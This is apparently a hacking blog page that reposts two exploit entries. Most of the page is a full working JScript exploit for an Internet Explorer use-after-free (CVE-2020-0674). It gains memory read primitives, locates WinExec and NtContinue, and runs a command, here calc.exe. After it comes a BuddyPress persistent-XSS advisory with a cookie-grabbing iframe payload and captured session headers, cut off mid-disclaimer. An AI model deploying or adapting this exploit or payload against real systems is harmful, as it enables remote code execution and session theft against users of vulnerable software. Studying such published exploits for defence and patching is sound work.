# Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free
# Date: 2020-05-07
# Exploit Author: maxpl0it
# Vendor Homepage: https://www.microsoft.com/
# Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx
# Version: IE 8, 9, 10, and 11
# Tested on: Windows 7 (x64)
# CVE : CVE-2020-0674
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" />
<script language="JScript.Compact">
// -------------------------------------------------------------------------------------------------
//
// Credits:
// maxpl0it (@maxpl0it) - Writing the exploit
// Qihoo 360 - Identifying the vulnerability in the wild
//
//
// Vulnerability: Use-After-Free when Array.sort() is called with a comparator function. The two
// arguments are untracked by the garbage collector.
//
// Exploit Description: This exploit was written for 64-bit IE instances.
// However, Enhanced Protected Mode sandboxing could be enabled for IE 10
// and IE 11 because EPM on Windows 7 simply enables x64 and doesn't do
// much else.
// The exploit executes C:\Windows\System32\calc.exe but doesn't implement
// any form of process continuation after execution.
//
// Testing:
// OS tested on: Windows 7
// IE versions tested on:
// 8 (x64 version)
// 9 (x64 version)
// 10 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64)
// 11 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64)
//
// Further notes:
// Video at https://twitter.com/maxpl0it/status/1253396942048104448
//
// The debug is better viewed in the console. Open Developer Tools and enable debug below.
//
// This is the non-EMET-bypassing version and only handles the stack pivot check and EAF.
//
// If you receive the error "Couldn't rewrite variable", verify that this is 64-bit IE and not a
// 32-bit process (iexplorer.exe and not iexplorer.exe *32)
//
// ------------------------------------------------------------------------------------------------------
// write_debug: Used to show debugging output.
function write_debug(str_to_write) {
if(debug) { // Switch is below
try{
console.log(str_to_write); // In IE, console only works if devtools is open.
} catch(e) {
try {
alert(str_to_write); // A lot of popups but provides information.
} catch(e) {
// Otherwise, nothing.
}
}
}
}
// Globals
var depth; // Used to track the depth of the recursion for the exploit function.
var spray; // Used to spray objects and fill GcBlocks.
var overlay; // Used to hold objects that will eventually contain properties that will reallocate freed GcBlocks.
var overlay_backup; // Used to make sure that the overlay objects still have a reference after the exploit is done. Otherwise they would be freed and reallocated.
var variants; // A string that contains a bunch of fake VAR structures. This is the property name that will cause the freed GcBlock to be reallocated.
var total; // Used to hold the untracked variable pointers for the use-after-free.
var leak_lower; // Holds the least significant DWORD of the 'next VVAL' pointer leak.
var leak_offset; // Since we don't want to free all overlay variables, this value will be used to identify which property we have got a pointer for so only this will be freed and reallocated later.
var leak_verify_var; // Used to verify that the rewrite worked. If the overlay cannot be freed and reallocated, then the exploit will not work.
var fakeobj_var; // Points at the property name string in the final VVAL. When the property name changes, a fake VAR is constructed in the name string and will change this fakeobj_var's type and object pointer values.
var trigger_obj; // Will contain the fake object and vftable.
var context; // Will store the context structure for NtContinue.
var padding = "AAAAAAAAAAA"; // Padding aligns so that the property with the manipulated hash will end up on top of an untracked var.
var leak = "\u0005"; // This manipulates the hash of the VVAL.
var leaked_var = "A"; // The final object property name. Needs to be created so that the 'next VVAL' pointer of the manipulated hash VVAL is filled.
var spray_size = 20000; // The size of the spray array.
var overlay_size = 20000; // The size of the overlay array.
var pad_size = 3000; // The size of padding for the trigger object. This padding adds additional space for functions like WinExec() to add their stack frames and the stack frames of the functions they call.
var sort = new Array(); // The array to be sorted with the vulnerable function.
var lfh = new Array(); // An array used to trigger lfh.
var debug = false; // Whether write_debug will do anything.
var command = "\u3a43\u575c\u6e69\u6f64\u7377\u535c\u7379\u6574\u336d\u5c32\u6163\u636c\u652e\u6578"; // The command to be executed. In this case it's "C:\Windows\System32\calc.exe"
// Setup - fills the sort array with arrays to be sorted. Done first to avoid the stack setup getting messed up.
for(i = 0; i < 310; i++) sort[i] = [0, 0];
// lfh_trigger: Used to trigger LFH for a particular size.
function lfh_trigger() {
for(i = 0; i < 50; i++) {
tmp = new Object();
tmp[Array(570).join('A')] = 1;
lfh.push(tmp);
}
}
// reset: Resets the objects used in the function initial_exploit so it could be used again.
function reset() {
depth = 0;
spray = new Array();
overlay = new Array();
total = new Array();
for(i = 0; i < overlay_size; i++) overlay[i] = new Object(); // Overlay must happen before spray
for(i = 0; i < spray_size; i++) spray[i] = new Object();
CollectGarbage();
}
// make_variant: Creates a fake VAR in a string.
function make_variant(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper) {
var charCodes = new Array();
charCodes.push(
// type
type, 0, 0, 0,
// obj_ptr
obj_ptr_lower & 0xffff, (obj_ptr_lower >> 16) & 0xffff, obj_ptr_upper & 0xffff, (obj_ptr_upper >> 16) & 0xffff,
// next_ptr
next_ptr_lower & 0xffff, (next_ptr_lower >> 16) & 0xffff, next_ptr_upper & 0xffff, (next_ptr_upper >> 16) & 0xffff
);
return String.fromCharCode.apply(null, charCodes);
}
// set_variants: A wrapper for make_variant that allocates and pads the property names to align the fake VARs correctly in memory.
function set_variants(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper) {
variants = "AAAAAAAA";
for(i=0; i < 46; i++) {
variants += make_variant(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper);
}
variants += "AAAAAAAAA";
}
// initial_exploit: The main exploit function.
function initial_exploit(untracked_1, untracked_2) {
untracked_1 = spray[depth*2];
untracked_2 = spray[depth*2 + 1];
if(depth > 150) {
spray = new Array(); // Erase spray
CollectGarbage(); // Add to free
for(i = 0; i < overlay_size; i++) {
overlay[i][variants] = 1;
overlay[i][padding] = 1;
overlay[i][leak] = 1;
overlay[i][leaked_var] = i; // Used to identify which leak is being used
}
total.push(untracked_1);
total.push(untracked_2);
return 0;
}
// Set pointers
depth += 1;
sort[depth].sort(initial_exploit);
total.push(untracked_1);
total.push(untracked_2);
return 0;
}
// rewrite: Frees the correct overlay object and reallocate over it as to replace the object at the leaked 'next property' pointer.
function rewrite(v, i){
CollectGarbage(); // Get rid of anything lingering that might screw up the exploit
overlay_backup[leak_offset] = null; // Erase the object to be replaced
CollectGarbage(); // Clear leak
overlay_backup[leak_offset] = new Object(); // New object - Might end up in the same slot as the last object
overlay_backup[leak_offset][variants] = 1; // Re-allocate the newly freed location (Take up the original GcBlock location again)
overlay_backup[leak_offset][padding] = 1; // Add padding to align the hash with the type to leak the 'next property' pointer
overlay_backup[leak_offset][leak] = 1; // The hash-manipulating property
overlay_backup[leak_offset][v] = i; // sets the property name and the initial VAR
}
// read_pointer: Rewrites the property and changes the fakeobj_var variable to a string at a specified location. This sets up the read primitive.
function read_pointer(addr_lower, addr_higher, o) {
rewrite(make_variant(8, addr_lower, addr_higher), o);
}
// read_byte: Reads the byte at the address using the length of the BSTR.
function read_byte(addr_lower, addr_higher, o) {
read_pointer(addr_lower + 2, addr_higher, o); // Use the length. However, when the length is found, it is divided by 2 (BSTR_LENGTH >> 1) so changing this offset allows us to read a byte properly.
return (fakeobj_var.length >> 15) & 0xff; // Shift to align and get the byte.
}
// read_word: Reads the WORD (2 bytes) at the specified address.
function read_word(addr_lower, addr_higher, o) {
read_pointer(addr_lower + 2, addr_higher, o);
return ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
}
// read_dword: Reads the DWORD (4 bytes) at the specified address.
function read_dword(addr_lower, addr_higher, o) {
read_pointer(addr_lower + 2, addr_higher, o);
lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
read_pointer(addr_lower + 4, addr_higher, o);
upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
return lower + (upper << 16);
}
// read_qword: Reads the QWORD (8 bytes) at the specified address.
function read_qword(addr_lower, addr_higher, o) {
// Lower
read_pointer(addr_lower + 2, addr_higher, o);
lower_lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
read_pointer(addr_lower + 4, addr_higher, o);
lower_upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
// Upper
read_pointer(addr_lower + 6, addr_higher, o);
upper_lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
read_pointer(addr_lower + 8, addr_higher, o);
upper_upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8);
return {'lower': lower_lower + (lower_upper << 16), 'upper': upper_lower + (upper_upper << 16)};
}
// test_read: Used to test whether the arbitrary read works. leak_lower + 64 points to the fakeobj_var location (property name string). The byte at this address is therefore expected to be 8 (String VAR type).
function test_read() {
if(read_byte(leak_lower + 64) != 8) {
throw Error("Arbitrary read failed.");
}
}
// test_fakeobj: Used to test whether fakeoj_var responds as expected when the type and value is changed.
function test_fakeobj() {
rewrite(make_variant(3, 23));
if(fakeobj_var + "" != 23) { // Turning it to a string causes the conversion to copy, dereferencing the 0x80 type. Type 0x80 being used directly won't work.
throw Error("Couldn't re-write fakeobj variable");
}
}
// test_rewrite: Used to test whether the VAR in the VVAL leaked address changes as expected.
function test_rewrite() {
rewrite(leaked_var, 23);
if(leak_verify_var + "" != 23) {
throw Error("Couldn't re-write variable");
}
}
// addrof: The 'address-of' primitive. Changes the VAR at the start of the VVAL to point to a given object and changes the fakeobj_var string to point to the object pointer of this VAR, thus allowing the address to be read.
function addrof(o) {
var_addr = read_dword(leak_lower + 8, 0, o); // Dereference the first VAR
return read_dword(var_addr + 8, 0, 1); // Get the Object pointer of the second VAR
}
// find_module_base: Finds the base of a module from a leaked pointer. Works by zeroing the least significant 16 bits of the address and subtracting 0x10000 until the DOS stub code is found at a specified offset.
function find_module_base(ptr) {
ptr.lower = (ptr.lower & 0xFFFF0000) + 0x4e; // Set to starting search point
while(true) {
if(read_dword(ptr.lower, ptr.upper) == 0x73696854) { // The string 'This'
write_debug("[+] Found module base!");
ptr.lower -= 0x4e; // Subtract the offset to get the base
return ptr;
}
ptr.lower -= 0x10000;
}
}
// leak_jscript_base: Gets the base of the jscript module by creating a new object, following the object pointers until the vftable is found, and then using the vftable leak to identify the base of jscript.dll.
function leak_jscript_base() {
// Create an object to leak vftable
obj = new Object();
// Get address of the object pointer
obj_ptr_addr = addrof(obj);
write_debug("[+] Object ptr at 0x" + obj_ptr_addr.toString(16));
// Get address of the vftable
vftable_addr = read_qword(obj_ptr_addr, 0, 1);
write_debug("[+] Vftable at upper 0x" + vftable_addr.upper.toString(16) + " and lower 0x" + vftable_addr.lower.toString(16));
return find_module_base(vftable_addr);
}
// leak_var: Executes the main exploit function in order to leak a 'next property' pointer.
function leak_var() {
reset();
variants = Array(570).join('A'); // Create the variants
sort[depth].sort(initial_exploit); // Exploit
overlay_backup = overlay; // Prevent it from being freed and losing our leaked pointer
leak_lower = undefined;
for(i = 0; i < total.length; i++) {
if(typeof total[i] === "number" && total[i] % 1 != 0) {
leak_lower = (total[i] / 4.9406564584124654E-324); // This division just converts the float into an easy-to-read 32-bit number
break;
}
}
}
// get_rewrite_offset: Executes the main exploit function again in order to create a number of fake VARs that point to the leaked location. This means that the object pointer can be read and the exact offset of the leaked property in the overlay array can be identified.
function get_rewrite_offset() {
reset();
set_variants(0x80, leak_lower); // Find the number of the object
sort[depth].sort(initial_exploit); // Exploit
for(i = 0; i < total.length; i++) {
if(typeof total[i] === "number") {
leak_offset = parseInt(total[i] + "");
leak_verify_var = total[i];
break;
}
}
}
// get_fakeobj: Identifies the fakeobj_var.
function get_fakeobj() {
rewrite(make_variant(3, 1234)); // Turn the name of the property into a variant
reset();
set_variants(0x80, leak_lower + 64); // Create a fake VAR pointing to the name of the property
sort[depth].sort(initial_exploit); // Exploit
for(i = 0; i < total.length; i++) {
if(typeof total[i] === "number") {
if(total[i] + "" == 1234) {
fakeobj_var = total[i];
break;
}
}
}
}
// leak_module: Used to leak a pointer for a given module that is imported by another module by traversing the PE structure in-memory.
function leak_module(base, target_name_lower, target_name_upper) {
// Get IMAGE_NT_HEADERS pointer
module_lower = base.lower + 0x3c; // PE Header offset location
module_upper = base.upper;
file_addr = read_dword(module_lower, module_upper, 1);
write_debug("[+] PE Header offset = 0x" + file_addr.toString(16));
// Get imports
module_lower = base.lower + file_addr + 0x90; // Import Directory offset location
import_dir = read_dword(module_lower, module_upper, 1);
write_debug("[+] Import offset = 0x" + import_dir.toString(16));
// Get import size
module_lower = base.lower + file_addr + 0x94; // Import Directory offset location
import_size = read_dword(module_lower, module_upper, 1);
write_debug("[+] Size of imports = 0x" + import_size.toString(16));
// Find module
module_lower = base.lower + import_dir;
while(import_size != 0) {
name_ptr = read_dword(module_lower + 0xc, module_upper, 1); // 0xc is the offset to the module name pointer
if(name_ptr == 0) {
throw Error("Couldn't find the target module name");
}
name_lower = read_dword(base.lower + name_ptr, base.upper);
name_upper = read_dword(base.lower + name_ptr + 4, base.upper);
if(name_lower == target_name_lower && name_upper == target_name_upper) {
write_debug("[+] Found the module! Leaking a random module pointer...");
iat = read_dword(module_lower + 0x10, module_upper); // Import Address Table
leaked_address = read_qword(base.lower + iat + 8, base.upper); // +8 since __imp___C_specific_handler can cause issues when imported in some jscript instances
write_debug("[+] Leaked address at upper 0x" + leaked_address.upper.toString(16) + " and lower 0x" + leaked_address.lower.toString(16));
return leaked_address;
}
import_size -= 0x14; // The size of each entry
module_lower += 0x14; // Increase entry pointer
}
}
// leak_export: Finds the location of a given exported function in a module. Works using binary search in order to speed it up. Assumes that the export name order is alphabetical.
function leak_export(base, target_name_first, target_name_second, target_name_third, target_name_fourth) {
// Get IMAGE_NT_HEADERS pointer
module_lower = base.lower + 0x3c; // PE Header offset location
module_upper = base.upper;
file_addr = read_dword(module_lower, module_upper, 1);
write_debug("[+] PE Header offset at 0x" + file_addr.toString(16));
// Get exports
module_lower = base.lower + file_addr + 0x88; // Export Directory offset location
export_dir = read_dword(module_lower, module_upper, 1);
write_debug("[+] Export offset at 0x" + import_dir.toString(16));
// Get the number of exports
module_lower = base.lower + export_dir + 0x14; // Number of items offset
export_num = read_dword(module_lower, module_upper, 1);
write_debug("[+] Export count is " + export_num);
// Get the address offset
module_lower = base.lower + export_dir + 0x1c; // Address offset
addresses = read_dword(module_lower, module_upper, 1);
write_debug("[+] Export address offset at 0x" + addresses.toString(16));
// Get the names offset
module_lower = base.lower + export_dir + 0x20; // Names offset
names = read_dword(module_lower, module_upper, 1);
write_debug("[+] Export names offset at 0x" + names.toString(16));
// Get the ordinals offset
module_lower = base.lower + export_dir + 0x24; // Ordinals offset
ordinals = read_dword(module_lower, module_upper, 1);
write_debug("[+] Export ordinals offset at 0x" + ordinals.toString(16));
// Binary search because linear search is too slow
upper_limit = export_num; // Largest number in search space
lower_limit = 0; // Smallest number in search space
num_pointer = Math.floor(export_num/2);
module_lower = base.lower + names;
search_complete = false;
while(!search_complete) {
module_lower = base.lower + names + 4*num_pointer; // Point to the name string offset
function_str_offset = read_dword(module_lower, module_upper, 0); // Get the offset to the name string
module_lower = base.lower + function_str_offset; // Point to the string
function_str_lower = read_dword(module_lower, module_upper, 0); // Get the first 4 bytes of the string
res = compare_nums(target_name_first, function_str_lower);
if(!res && target_name_second) {
function_str_second = read_dword(module_lower + 4, module_upper, 0); // Get the next 4 bytes of the string
res = compare_nums(target_name_second, function_str_second);
if(!res && target_name_third) {
function_str_third = read_dword(module_lower + 8, module_upper, 0); // Get the next 4 bytes of the string
res = compare_nums(target_name_third, function_str_third);
if(!res && target_name_fourth) {
function_str_fourth = read_dword(module_lower + 12, module_upper, 0); // Get the next 4 bytes of the string
res = compare_nums(target_name_fourth, function_str_fourth);
}
}
}
if(!res) { // equal
module_lower = base.lower + ordinals + 2*num_pointer;
ordinal = read_word(module_lower, module_upper, 0);
module_lower = base.lower + addresses + 4*ordinal;
function_offset = read_dword(module_lower, module_upper, 0);
write_debug("[+] Found target export at offset 0x" + function_offset.toString(16));
return {'lower': base.lower + function_offset, 'upper': base.upper};
} if(res == 1) {
if(upper_limit == num_pointer) {
throw Error("Failed to find the target export.");
}
upper_limit = num_pointer;
num_pointer = Math.floor((num_pointer + lower_limit) / 2);
} else {
if(lower_limit == num_pointer) {
throw Error("Failed to find the target export.");
}
lower_limit = num_pointer;
num_pointer = Math.floor((num_pointer + upper_limit) / 2);
}
if(num_pointer == upper_limit && num_pointer == lower_limit) {
throw Error("Failed to find the target export.");
}
}
throw Error("Failed to find matching export.");
}
// compare_nums: Compares two numbers that represent 4-byte strings for equality. If not, it detects which character is larger or smaller.
function compare_nums(target, current) { // return -1 for target being greater, 0 for equal, 1 for current being greater
write_debug("[*] Comparing 0x" + target.toString(16) + " and 0x" + current.toString(16));
if(target == current) {
write_debug("[+] Equal!");
return 0;
}
while(target != 0 && current != 0) {
if((target & 0xff) > (current & 0xff)) {
return -1;
} else if((target & 0xff) < (current & 0xff)) {
return 1;
}
target = target >> 8;
current = current >> 8;
}
}
// generate_gadget_string: Takes a gadget address and creates a string from it.
function generate_gadget_string(gadget) {
return String.fromCharCode.apply(null, [gadget.lower & 0xffff, (gadget.lower >> 16) & 0xffff, gadget.upper & 0xffff, (gadget.upper >> 16) & 0xffff]);
}
// generate_obj_vftable: Creates a fake object with a fake vftable containing a few ROP gadgets.
function generate_obj_vftable(initial_jmp) {
trigger_obj = Array(pad_size + 1).join('A'); // Adds lots of stack space to either side to prevent msvcrt.dll crashing
trigger_obj = trigger_obj + Array(157).join('A') + generate_gadget_string(initial_jmp);
trigger_obj = trigger_obj.substr(0, trigger_obj.length);
trigger_addr = string_addr(trigger_obj);
write_debug("[+] Trigger object at 0x" + trigger_addr.upper.toString(16) + " 0x" + trigger_addr.lower.toString(16));
return trigger_addr;
}
// generate_context: Creates a partial fake CONTEXT structure to use with NtContinue. P1Home and P2Home are missing because this structure is a part of the fake object. This means that no stack pivot is needed for execution of this exploit. The leaked stack pointer is also used to protect against stack pivot detection.
function generate_context(command_address, leaked_stack_ptr, kernel32_winexec_export) {
return "\u0000\u0000\u0000\u0000" + // P3Home
"\u0000\u0000\u0000\u0000" + // P4Home
"\u0000\u0000\u0000\u0000" + // P5Home
"\u0000\u0000\u0000\u0000" + // P6Home
"\u0003\u0010" + // ContextFlags
"\u0000\u0000" + // MxCsr
"\u0033" + // SegCs
"\u0000" + // SegDs
"\u0000" + // SegEs
"\u0000" + // SegFs
"\u0000" + // SegGs
"\u002b" + // SegSs
"\u0246\u0000" + // EFlags
"\u0000\u0000\u0000\u0000" + // Dr0 - Prevents EAF too!
"\u0000\u0000\u0000\u0000" + // Dr1
"\u0000\u0000\u0000\u0000" + // Dr2
"\u0000\u0000\u0000\u0000" + // Dr3
"\u0000\u0000\u0000\u0000" + // Dr6
"\u0000\u0000\u0000\u0000" + // Dr7
"\u0000\u0000\u0000\u0000" + // Rax
generate_gadget_string(command_address) + // Rcx - Command pointer
"\u0000\u0000\u0000\u0000" + // Rdx - SW_HIDE
"\u0000\u0000\u0000\u0000" + // Rbx
generate_gadget_string(leaked_stack_ptr) + // Rsp - Leaked Stack pointer
"\u0000\u0000\u0000\u0000" + // Rbp
"\u0000\u0000\u0000\u0000" + // Rsi
"\u0000\u0000\u0000\u0000" + // Rdi
"\u0040\u0000\u0000\u0000" + // R8
"\u0000\u0000\u0000\u0000" + // R9
"\u0000\u0000\u0000\u0000" + // R10
"\u0000\u0000\u0000\u0000" + // R11
"\u0000\u0000\u0000\u0000" + // R12
"\u0000\u0000\u0000\u0000" + // R13
"\u0000\u0000\u0000\u0000" + // R14
"\u0000\u0000\u0000\u0000" + // R15
generate_gadget_string(kernel32_winexec_export); // Rip - WinExec() call
}
// trigger_exec: Triggers code execution by creating a fake VAR of type 0x81, setting it's vftable to the payload, and causing execution by using typeof.
function trigger_exec(obj_addr, command_address, leaked_stack_ptr, kernel32_winexec_export) {
rewrite(make_variant(0x81, leak_lower + 96, 0) + make_variant(0, obj_addr.lower + 2 * (pad_size), 0) + generate_context(command_address, leaked_stack_ptr, kernel32_winexec_export));
write_debug("[*] About to trigger...");
typeof fakeobj_var;
}
// leak_stack_ptr: Leaks a stack pointer in order to avoid stack pivot detection in the CONTEXT structure.
function leak_stack_ptr() {
leak_obj = new Object(); // Create an object
obj_addr = addrof(leak_obj); // Get address
csession_addr = read_dword(obj_addr + 24, 0, 1); // Get CSession from offset 24
stack_addr_lower = read_dword(csession_addr + 80, 0, 1); // Get the lower half of the stack pointer from offset 80
stack_addr_upper = read_dword(csession_addr + 84, 0, 1); // Get the upper half of the stack pointer from offset 84
return {'lower': stack_addr_lower, 'upper': stack_addr_upper};
}
// string_addr: Gets the address of a string in an object that can be used in a chain.
function string_addr(string_to_get) {
return {'lower': addrof(string_to_get), 'upper': 0};
}
// main: The entire exploit.
function main(){
// Setup functions
lfh_trigger(); // Trigger LFH - May or may not make the exploit more reliable, but can't hurt
// Leak VAR
leak_var();
// Identify offset for reliable rewrite
get_rewrite_offset();
// Test rewrite
test_rewrite();
// Create a fake VAR
get_fakeobj();
// Test fakeobj rewrite
test_fakeobj();
// Output results so far
write_debug("[+] Leaked address 0x" + leak_lower.toString(16) + " is at offset " + leak_offset);
// Test read
test_read();
// Get the module base for jscript
jscript_base = leak_jscript_base();
// Get the msvcrt base by following the jscript import table
mscvcrt_leak = leak_module(jscript_base, 0x6376736d, 0x642e7472);
msvcrt_base = find_module_base(mscvcrt_leak);
write_debug("[+] Found msvcrt base at 0x" + msvcrt_base.upper.toString(16) + " 0x" + msvcrt_base.lower.toString(16));
// Get the ntdll base by following the msvcrt import table
ntdll_leak = leak_module(msvcrt_base, 0x6c64746e, 0x6c642e6c);
ntdll_base = find_module_base(ntdll_leak);
write_debug("[+] Found ntdll at 0x" + ntdll_base.upper.toString(16) + " 0x" + ntdll_base.lower.toString(16));
// Get the kernel32 base by following the jscript import table
kernel32_leak = leak_module(jscript_base, 0x4e52454b, 0x32334c45);
kernel32_base = find_module_base(kernel32_leak);
write_debug("[+] Found kernel32 at 0x" + kernel32_base.upper.toString(16) + " 0x" + kernel32_base.lower.toString(16));
// Find the WinExec function address from kernel32
kernel32_winexec_export = leak_export(kernel32_base, 0x456e6957, 0, 0, 0);
write_debug("[+] Found WinExec at 0x" + kernel32_winexec_export.upper.toString(16) + " 0x" + kernel32_winexec_export.lower.toString(16));
// Find the NtContinue function address from ntdll
ntdll_ntcontinue_export = leak_export(ntdll_base, 0x6f43744e, 0x6e69746e, 0, 0);
write_debug("[+] Found NtContinue at 0x" + ntdll_ntcontinue_export.upper.toString(16) + " 0x" + ntdll_ntcontinue_export.lower.toString(16));
// Get the address of the command to be executed
command_address = string_addr(command);
// Leak the stack pointer
leaked_stack_ptr = leak_stack_ptr();
// Create fake object and vftable
obj_addr = generate_obj_vftable(ntdll_ntcontinue_export);
// Generate context and trigger code execution
trigger_exec(obj_addr, command_address, leaked_stack_ptr, kernel32_winexec_export);
}
// Call main()
main();
</script>
</head>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863153521
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-13
# Vendor Homepage: https://wordpress.org/plugins/buddypress/
# Version: 6.2.0
Document Title:
===============
Buddypress v6.2.0 WP Plugin - Persistent Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2263
Release Date:
=============
2020-11-13
Vulnerability Laboratory ID (VL-ID):
====================================
2263
Common Vulnerability Scoring System:
====================================
4.2
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Are you looking for modern, robust, and sophisticated social network
software? BuddyPress is a suite of components that are common
to a typical social network, and allows for great add-on features
through WordPress’s extensive plugin system. Aimed at site builders
& developers, BuddyPress is focused on ease of integration, ease of use,
and extensibility. It is deliberately powerful yet unbelievably
simple social network software, built by contributors to WordPress.
(Copy of the Homepage: https://wordpress.org/plugins/buddypress/ &
https://buddypress.org/download/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent
xss web vulnerability in the Buddypress v6.2.0 plugin for wordpress.
Affected Product(s):
====================
Buddypress
Product: Buddypress v6.0.0 - v6.2.0 (Wordpress Plugin)
Vulnerability Disclosure Timeline:
==================================
2020-11-13: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the Buddypress v6.0.0 - v6.2.0 plugin for wordpress.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent vulnerability is located in the `wp:html` name parameter
of the `figure` content. Remote attackers with privileges
are able to inject own malicious persistent script code as input to
compromise the internal ui of the wordpress backend. The attacker
injects his code and in case the admin or other privileged user account
previews the content the code simple executes. The request method
to inject is POST and the attack vector is located on the application-side.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected
application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] wp:html
Vulnerable Parameter(s):
[+] figure
Affected Module(s):
[+] page_id=x&preview=true
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers
with privilged user accounts without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
PoC: Inject
https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
PoC: Execute
https://test23.localhost:8000/?page_id=6
https://test23.localhost:8000/?page_id=6&preview=true
PoC: Vulnerable Source
<div id="content" class="site-content">
<div class="wrap">
<div id="primary" class="content-area">
<main id="main" class="site-main" role="main">
<article id="post-6" class="post-6 page type-page status-draft hentry">
<header class="entry-header">
<h1 class="entry-title">Mitglieder</h1><span class="edit-link">
<a class="post-edit-link"
href="https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit">
<span class="screen-reader-text">„Mitglieder“</span>
bearbeiten</a></span> </header><!-- .entry-header -->
<div class="entry-content">
<p></p>
<div class="wp-block-group"><div class="wp-block-group__inner-container">
<div class="wp-block-group"><div
class="wp-block-group__inner-container"></div></div>
</div></div>
<figure><iframe src="evil.source"
onload="alert(document.cookie)"></iframe></figure>
</div><!-- .entry-content -->
</article><!-- #post-6 -->
</main><!-- #main -->
</div><!-- #primary -->
</div><!-- .wrap -->
</div>
--- PoC Session Logs (POST) ---
https://test23.localhost:8000/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F6&_locale=user
Host: test23.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
Gecko/20100101 Firefox/76.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
X-WP-Nonce: 04a953e188
X-HTTP-Method-Override: PUT
Content-Type: application/json
Origin: https://test23.localhost:8000
Content-Length: 614
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie:
g3sid=bdbf56f2335bbce0720f03ed25343b66db61b54a%7E6a5nrndvh14i5kb09tfrl7afe2;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_55a3fb1cb724d159a111224c7f110400=admin_f507c7w4%7C1589912472%7CxTSn77nlwpdxYR8NUaJOXfQM9ShaBlSLzP7Anix
xNt8%7C557ca2874863d9f1f6a8316659798e11558a01ffc8671eea68d496aa5df99b17;
wp-settings-time-1=1589740723
{"id":6,"content":"<!-- wp:paragraph -->n<p></p>n<!-- /wp:paragraph
-->nn<!-- wp:group -->n<div class="wp-block-group">
<div class="wp-block-group__inner-container"><!-- wp:group -->n<div
class="wp-block-group"><div class="wp-block-group__inner-container">
<!-- wp:block {"ref":"reusable1"} /--></div></div>n<!-- /wp:group
--></div></div>n<!-- /wp:group -->nn
<!-- wp:block {"ref":"reusable1"} /-->nn<!-- wp:block
{"ref":"reusable1"} /-->nn
<!-- wp:html -->n<figure><iframe src="evil.source"
onload="alert(document.cookie)"></iframe></figure>n<!-- /wp:html
-->nn<!-- wp:bp/member /-->"}
-
POST: HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, max-age=0
Allow: GET, POST, PUT, PATCH, DELETE
Content-Type: application/json; charset=UTF-8
Vary: Origin
Server: Microsoft-IIS/8.5
X-Robots-Tag: noindex
Link: <https://test23.localhost:8000/index.php?rest_route=/>;
rel="https://api.w.org/"
Content-Length: 3108
References:
https://test23.localhost:8000/index.php
https://test23.localhost:8000/wp-admin/post.php
Security Risk:
==============
The security risk of the persistent input validation web vulnerability
in the web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
